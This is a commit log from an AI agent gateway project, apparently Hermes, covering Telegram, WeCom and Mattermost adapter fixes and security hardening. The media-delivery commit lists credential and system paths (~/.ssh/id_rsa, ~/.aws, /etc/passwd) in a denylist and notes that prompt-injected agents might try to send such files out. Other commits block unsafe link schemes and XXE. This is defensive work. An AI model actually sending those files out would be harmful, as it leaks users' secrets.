Teknium	31c8d5ff5f	chore(wecom): make defusedxml dep acquireable and tolerant of absence Follow-up on top of @TheOnlyMika's #32155 cherry-pick. The defusedxml hardening import was unconditional, which would break the gateway for anyone running a WeComCallback adapter without the (transitive-only) defusedxml present. - Wrap the import in the same try/except pattern as aiohttp/httpx in the same file. Sets DEFUSEDXML_AVAILABLE flag. - Extend check_wecom_callback_requirements() to gate on the flag, so the gateway logs the actual missing dep and skips the adapter instead of crashing. - Add [wecom] extra to pyproject.toml with defusedxml==0.7.1. - Register platform.wecom_callback in tools/lazy_deps.py so users get prompted to install it on first WeComCallback configuration, same pattern as discord/slack/matrix. defusedxml is still the right call for pre-auth XML parsing — this commit just makes the dep declarative and recoverable instead of a hard import-time crash.	2026-05-25 23:30:43 -07:00
TheOnlyMika	5744b17579	harden: restrict markdown link schemes; parse untrusted XML with defusedxml Two small defensive-hardening changes: - web/src/components/Markdown.tsx: render links only for http(s)/mailto schemes; other schemes (javascript:, data:, vbscript:) are dropped to plain text so a crafted link in rendered content can't execute on click. - gateway/platforms/wecom_callback.py: parse the untrusted, pre-auth WeCom callback request body with defusedxml instead of xml.etree, blocking entity-expansion / billion-laughs (and XXE) on the parse path. defusedxml is already a dependency (uv.lock); response-building XML in wecom_crypto.py is unchanged (it is not parsed from untrusted input). Verified: dashboard typechecks and builds; defusedxml blocks an entity-expansion payload while valid WeCom envelopes still parse.	2026-05-25 23:30:43 -07:00
Krisli Dimo	9d10c45e32	fix(telegram): tighten table row-group spacing and drop redundant first bullet The GFM → Telegram-row-group rewriter previously joined every line in every row with a blank line ("\n\n".join(rendered_rows)), which made multi-column tables explode into one-bullet-per-paragraph walls on mobile. It also emitted the row heading twice when the table had no row-label column: once as the standalone bold heading and once again as the first labeled bullet (heading == headers[0] == data_cells[0]). This commit: * Uses single newlines between the heading and its bullets within a row-group, and a blank line only BETWEEN row-groups. * Skips any bullet whose value duplicates the heading text when the table has no row-label column (the heading already carries that information). Tables WITH a row-label column are unaffected since the heading comes from the label cell and never duplicates a header. Updated existing test assertions accordingly and added two regression tests: one that reproduces the screenshot bug (wide five-column "Plays" comparison table) and one that pins the row-label-column behavior so the dedup logic doesn't accidentally swallow real data. tests/gateway/test_telegram_format.py: 101 passed	2026-05-25 23:16:00 -07:00
Teknium	2c6bbaf352	fix(gateway): coerce scalar `model:` to dict before /model --global persist (#32272 ) Reported via AskClaw. When config.yaml has `model: <name>` (flat string) instead of the nested `model: {default: ..., provider: ...}` form, every gateway `/model X --global` crashed silently with TypeError: 'str' object does not support item assignment The persist block did: model_cfg = cfg.setdefault("model", {}) model_cfg["default"] = result.new_model `setdefault` returns the existing scalar, and the next assignment blows up. The 'switch failed' warning was logged at WARNING level and the user never saw why their persist didn't stick. Coerce scalar/None `model:` into a dict before mutation, in both the gateway path (`gateway/run.py`) and the sister site in `hermes_cli/doctor.py --fix` (same setdefault-on-string flaw). The CLI `/model` path is unaffected because it goes through `_set_nested` which already replaces scalar leaves with dicts. Regression test `tests/gateway/test_model_command_flat_string_config.py` covers the flat-string, missing, and proper-dict cases. Without the fix, the flat-string case fails with the exact original TypeError.	2026-05-25 15:22:23 -07:00
teknium1	27df4b3882	fix(telegram): exempt reply_to_mode=off DM topic sends from anchor-required guard Salvage follow-up. The new private-DM-topic fail-loud contract from PR #27107 hits 'requires a reply anchor' when reply_to_mode='off' is configured, even though commit `21a15b671` (PR #23994) verified that message_thread_id alone routes correctly on python-telegram-bot's reference client when the user has explicitly opted out of quote bubbles. Carve out the explicit opt-in path so users on reply_to_mode 'off' aren't regressed — the new guard now only applies to callers that didn't ask for the anchor to be suppressed.	2026-05-25 14:54:02 -07:00
stepanov1975	5b1c75d662	refactor: simplify Telegram DM topic refresh (cherry picked from commit `bf8048ad87`)	2026-05-25 14:54:02 -07:00
stepanov1975	c394e7919d	fix: refresh stale Telegram DM topic threads (cherry picked from commit `26b87057ad`)	2026-05-25 14:54:02 -07:00
stepanov1975	dcd504cea4	fix: auto-create Telegram DM topics for delivery (cherry picked from commit `5cde0614e8`)	2026-05-25 14:54:02 -07:00
stepanov1975	96c71d8c46	fix: require anchors for Telegram DM topic deliveries (cherry picked from commit `6daafb3fd4`)	2026-05-25 14:54:02 -07:00
stepanov1975	415be55394	fix: route Telegram DM topic deliveries directly (cherry picked from commit `ad8f97db6c`)	2026-05-25 14:54:02 -07:00
alt-glitch	b62af47da8	chore: drop stale line-number reference in PRIORITY path comment The cherry-pick comment referenced 'line ~6771' for the /stop handler, but on current main the handler is at a different offset. Remove the hard-coded line number — the 'above' reference is sufficient.	2026-05-25 16:23:24 +00:00
xxxigm	99d62f6ba1	fix(gateway): protect in-flight subagents from busy-mode interrupts (#30170 ) When a user sends a conversational follow-up while delegate_task is running, gateway/run.py calls running_agent.interrupt(event.text) on the PARENT agent. AIAgent.interrupt() then cascades synchronously through self._active_children and calls interrupt() on every child subagent, aborting in-flight delegate_task work. The user sees the fallback cascade with no root-cause in the gateway log, and minutes of subagent progress are destroyed — the exact failure mode reported in Add GatewayRunner._agent_has_active_subagents(running_agent) — a static helper that returns True iff the parent is currently driving subagents via delegate_task. The helper is type-defensive: it ignores truthy MagicMock auto-attributes (so this doesn't accidentally fire in every test mock that hits the busy path), the _AGENT_PENDING_SENTINEL placeholder, and missing locks. Wire the helper into both interrupt branches: 1. _handle_active_session_busy_message — the adapter-level busy handler. When busy_input_mode == 'interrupt' AND the parent has active subagents, demote to 'queue' semantics: skip the parent.interrupt() call, merge the message into the pending queue, and surface a dedicated ack ("⏳ Subagent working — your message is queued for when it finishes (use /stop to cancel everything).") so the operator knows the message wasn't lost and discovers the explicit escape hatch. 2. The PRIORITY interrupt branch inside _handle_message — the non-command fast path. Same rationale, same demotion. Routes through _queue_or_replace_pending_event so the next-turn pickup stays unchanged. Explicit /stop and /new commands take a completely different path (_interrupt_and_clear_session in the slash-command dispatch at line ~6771) and are NOT affected by this guard — the operator still has a way to force-cancel everything when they actually mean it. Configured 'queue' and 'steer' modes are also untouched: 'queue' already does the right thing, and 'steer' goes through running_agent.steer() which does NOT cascade to children (so subagents survive a steer too). This is Phase 1 of the fix outlined in #30170 — the minimum viable change that stops subagent loss. Phase 2 (delegation-aware steer forwarding to active children) and Phase 3 (async delegation, #11508) are intentionally out of scope. Refs #30170.	2026-05-25 16:23:24 +00:00
Teknium	a989a79c0c	fix(gateway): allow native delivery of freshly-produced agent files (#32060 ) The gateway's media delivery allowlist required files live inside `~/.hermes/cache/{documents,images,...}`, which is the wrong shape for real agent usage. Agents naturally produce artifacts via terminal tools (`pandoc -o /tmp/report.pdf`, `matplotlib savefig`, etc.) or write_file into project directories — these never land under the cache. Result: users got a raw file path in chat instead of an attachment. This is doubly bad in deployment shapes where the cache directories aren't writable by the agent at all: Hermes running in Docker with a read-only mount, or with a Docker/Modal/SSH terminal backend whose filesystem isn't the gateway host's filesystem. Layered trust model: 1. Cache-dir allowlist (unchanged) — Hermes-managed roots always trusted. 2. Operator allowlist — `HERMES_MEDIA_ALLOW_DIRS` env var, now also surfaced as `gateway.media_delivery_allow_dirs` in config.yaml. 3. Recency-based trust (new, default on) — files whose mtime is within `gateway.trust_recent_files_seconds` (default 600s) of "now" are trusted even outside the cache/operator allowlist. Old host files (`/etc/passwd`, `~/.bashrc`, `~/.ssh/id_rsa`) have mtimes measured in days/months, well outside the window — prompt-injection paths pointing at pre-existing files are still rejected. 4. Hard denylist — `/etc`, `/proc`, `/sys`, `/dev`, `/root`, `/boot`, `/var/{log,lib,run}`, plus `$HOME/.{ssh,aws,gnupg,kube,docker,config, azure,gcloud}` and `Library/Keychains`. Denylist blocks delivery even when recency would trust the file, in case an attacker somehow refreshes a sensitive file's mtime. Operators who want strict-allowlist behavior set `gateway.trust_recent_files: false` and the system reverts to pre-existing behavior. Tests: 6 new cases in test_platform_base.py cover the recency window, disabled mode, system-path denylist, and the motivating PDF-in-project scenario. 3 existing tests (test_platform_base, test_tts_media_routing, test_send_message_tool) that exercised the strict-allowlist path are updated to disable recency trust explicitly. E2E validation: real `validate_media_delivery_path()` accepts fresh PDFs in /tmp and project dirs, rejects /etc/passwd, ~/.ssh/id_rsa, and files older than the window; config.yaml `gateway.*` keys bridge correctly to the env vars the validator reads.	2026-05-25 05:34:31 -07:00
Radical Edward	3914089d52	fix(compression): 3-line fix for infinite compression loop (#29335 ) Three compounding root causes: A) run_conversation() result dict missing session_id — gateway's dead-code guard at gateway/run.py:8700 never triggers B) preflight compression bypasses should_compress() anti-thrashing — re-triggers every turn when tool schemas dominate token budget C) gateway updates session_entry.session_id in memory but doesn't persist via session_store._save() Fixes: #29335	2026-05-25 01:44:46 -07:00
Claw Assistant	1c7a783c42	fix(cli,gateway): strip outer brackets/quotes from /resume args + accept session IDs in gateway The /resume usage hint shows '<session_id_or_title>' which a few users have typed verbatim, including the angle brackets. Strip outer <>, [], "", and '' from the argument before lookup so '/resume <abc123>' works the same as '/resume abc123'. Mirrors the new bracket-stripping in the CLI handler. Also let the gateway resolve a bare session ID. Previously the gateway only called resolve_session_by_title, so '/resume <session_id>' always returned 'Session not found' even for valid IDs. Try get_session() first, fall back to title resolution second. Surgical reapply of PR #10215 (branch was based on a many-months-old main and reverted ~3100 unrelated files; original commit by claw@openclaw.ai preserved via --author).	2026-05-25 01:33:32 -07:00
Glen Workman	d952b377aa	fix: add cron API provenance logging (#24889 ) Co-authored-by: sgtworkman <178342791+sgtworkman@users.noreply.github.com>	2026-05-25 01:15:56 -07:00
kshitijk4poor	af973e4071	refactor(gateway): migrate Mattermost adapter to bundled plugin Second migration of an existing built-in platform adapter after Discord (PR #30591) — follows the same shape established by IRC / Teams / LINE / Google Chat / SimpleX and the playbook in `references/platform-plugin-migration.md`. Advances the umbrella refactor in #3823. Matches Discord's parity bar — adapter under `plugins/platforms/mattermost/` with the standard `__init__.py` / `adapter.py` / `plugin.yaml` shell, `register(ctx)` entry point, no back-compat shim at the old import path, and full parity for all five hooks Discord uses plus the `apply_yaml_config_fn` hook (mattermost is the second consumer of #25443 after Discord): * `standalone_sender_fn` — out-of-process cron delivery via Mattermost REST API. Picks up the thread_id + media_files capabilities the legacy `_send_mattermost` lacked (parity with Discord's `_standalone_send`). * `setup_fn` — interactive `hermes setup gateway` wizard. * `apply_yaml_config_fn` — translates `config.yaml` `mattermost:` keys (`require_mention`, `free_response_channels`, `allowed_channels`) into `MATTERMOST_` env vars (replaces the hardcoded block in `gateway/config.py`). `is_connected` — declares connection state from `MATTERMOST_TOKEN` + `MATTERMOST_URL`. * `check_fn` — verifies aiohttp is installed and both required env vars are set. * plus `allowed_users_env`, `allow_all_env`, `cron_deliver_env_var`, `max_message_length` (4000 — Mattermost practical limit), `emoji`, `required_env`, `install_hint`. Files ----- * `gateway/platforms/mattermost.py` (873 LOC) → `plugins/platforms/mattermost/adapter.py` (git rename, R071) + appended `register()` block, hook helpers, and `_standalone_send` with media upload + thread_id support. * New `plugins/platforms/mattermost/{__init__.py, plugin.yaml}` with `requires_env` / `optional_env` declarations covering MATTERMOST_URL, MATTERMOST_TOKEN, MATTERMOST_ALLOWED_USERS, MATTERMOST_ALLOW_ALL_USERS, MATTERMOST_HOME_CHANNEL, MATTERMOST_REPLY_MODE, MATTERMOST_REQUIRE_MENTION, MATTERMOST_FREE_RESPONSE_CHANNELS, MATTERMOST_ALLOWED_CHANNELS. * `gateway/config.py`: delete 17-LOC `mattermost_cfg` YAML→env bridge (moved into plugin's `_apply_yaml_config`). * `gateway/run.py::_create_adapter`: delete `Platform.MATTERMOST elif` — replaced by the existing generic plugin-registry-first dispatch. * `tools/send_message_tool.py`: delete `_send_mattermost` (22 LOC) + `Platform.MATTERMOST elif` in `_send_to_platform` — the `else` branch already routes plugin platforms through `_send_via_adapter`, which hits the registry's `standalone_sender_fn`. * `hermes_cli/setup.py`: delete `_setup_mattermost` (44 LOC) — replaced by the plugin's `interactive_setup`. * `hermes_cli/gateway.py`: delete `_PLATFORMS["mattermost"]` dict entry (3 LOC) — plugin's `setup_fn` is dispatched via the plugin path in `_configure_platform`. * Consumer rewrite: 5 test files (test_mattermost.py, test_media_download_retry.py, test_send_multiple_images.py, test_stream_consumer.py, test_ws_auth_retry.py) get `gateway.platforms.mattermost` → `plugins.platforms.mattermost.adapter` with the bulk-rewrite recipe from the platform-plugin-migration playbook. Single `mock.patch` string in test_stream_consumer.py also repointed. * `tests/tools/test_send_message_missing_platforms.py`: thin `(token, extra, chat_id, message)` compat shim around the plugin's `_standalone_send(pconfig, …)` so existing test bodies continue to work without rewriting every signature. Validation ---------- * Plugin discovery: mattermost registers from `plugins/platforms/mattermost/` alongside discord / teams / irc / line / google_chat / simplex. All 9 hooks present (setup_fn, standalone_sender_fn, apply_yaml_config_fn, is_connected, check_fn, allowed_users_env, allow_all_env, cron_deliver_env_var, max_message_length=4000). * Mattermost-touching tests: 62/62 pass (`test_mattermost.py` + `test_send_message_missing_platforms.py`). * Targeted selectors (mattermost or platform_registry or stream_consumer or ws_auth_retry or media_download_retry or send_multiple_images or send_message_tool or platform_connected): 433/433 pass. * Full sweep (`scripts/run_tests.sh tests/gateway/ tests/cron/ tests/tools/test_send_message_tool.py tests/tools/test_send_message_missing_platforms.py tests/integration/`): 6220/6220 pass in 47.8s, 0 failures. * Lint: ruff clean on all touched files. * Git identity verified: kshitijk4poor. * Rename detection: R071 (similarity dropped from a hypothetical R09x by the ~320-line appended register block — ~36% growth over the 873-LoC base, vs Discord's 5101 LoC base which kept R091). Closes part of #3823.	2026-05-24 18:05:33 -07:00
daizhonggeng	fef733d56b	feat: support numbered resume selection in cli and gateway	2026-05-24 16:22:48 -07:00
Teknium	396ee69032	fix(gateway): seed plugin extras before is_connected gate (#31703 ) Follow-up to `54e61f933`. The plugin enablement gate calls ``entry.is_connected(probe_cfg)`` BEFORE ``env_enablement_fn`` runs, and the probe is built as ``existing_cfg or PlatformConfig()`` — empty extras, ``enabled=False``. For plugins whose ``is_connected`` reads ``config.extra`` instead of env vars directly, that probe is a misrepresentation of what the platform will look like after enablement. Google Chat's ``_is_connected`` short-circuits on ``config.enabled`` and inspects ``config.extra["project_id"]`` / ``config.extra["subscription_name"]`` — both False on the default probe even when the user has set ``GOOGLE_CHAT_PROJECT_ID`` and ``GOOGLE_CHAT_SUBSCRIPTION_NAME``. Result: Google Chat silently fails the gate on every env-var-only setup. Build a candidate probe that mirrors what the platform will look like post-enablement: - pre-call ``env_enablement_fn`` and layer its result into the probe's ``extra`` (without mutating any existing platform config) - pass ``enabled=True`` on the probe — we're asking "would this BE configured if we let it in?" not "is it currently enabled?" - reuse the same seeded extras when we commit the platform to ``config.platforms`` (avoids calling ``env_enablement_fn`` twice) Discord/IRC/Teams/LINE/ntfy/Simplex ``_is_connected`` hooks read env vars directly, so they are unaffected. This change only restores Google Chat on env-var-only setups while keeping the original #31116 Discord-no-token block intact. All 6 shipped ``env_enablement_fn`` implementations were audited and are pure reads (no ``os.environ`` writes), so running them earlier in the loop has no observable side effects. Tests: 2 new in tests/gateway/test_platform_registry.py covering extras-seeded-before-is_connected and don't-leak-extras-on-gate-fail. 693 tests across 11 adjacent suites pass (platform_registry, config, google_chat, matrix, discord_connect, ntfy_plugin, simplex_plugin, line_plugin, irc_adapter, teams, gateway_platform_gating). Refs #31116.	2026-05-24 15:44:26 -07:00
helix4u	514f5020c7	fix(debug): redact BlueBubbles webhook secrets	2026-05-24 15:43:48 -07:00
Maxim Esipov	bdc9b0eff5	fix(telegram): preserve new DM topic lanes	2026-05-24 15:28:40 -07:00
Yuan Li	476c897439	fix(telegram): gate send() on send-path health after reconnect storms (#31165 ) After sustained Bad Gateway / TimedOut reconnect cycles, the PTB httpx client can enter a state where bot.send_message() returns a valid Message (real message_id) but the message never reaches the recipient. TelegramAdapter.send returns SendResult(success=True) and cron's live-adapter branch marks the run delivered while the message is silently dropped. Add a _send_path_degraded flag. _handle_polling_network_error sets it on reconnect storms; the existing _verify_polling_after_reconnect heartbeat probe clears it once getMe() confirms the Bot client is healthy. While the flag is set, send() short-circuits with SendResult(success=False, retryable=True) so cron falls through to the standalone delivery path (fresh HTTP session). Closes #31165. Co-authored-by: teknium1 <127238744+teknium1@users.noreply.github.com>	2026-05-24 15:27:41 -07:00

1 2 3 4 5 ...

1812 commits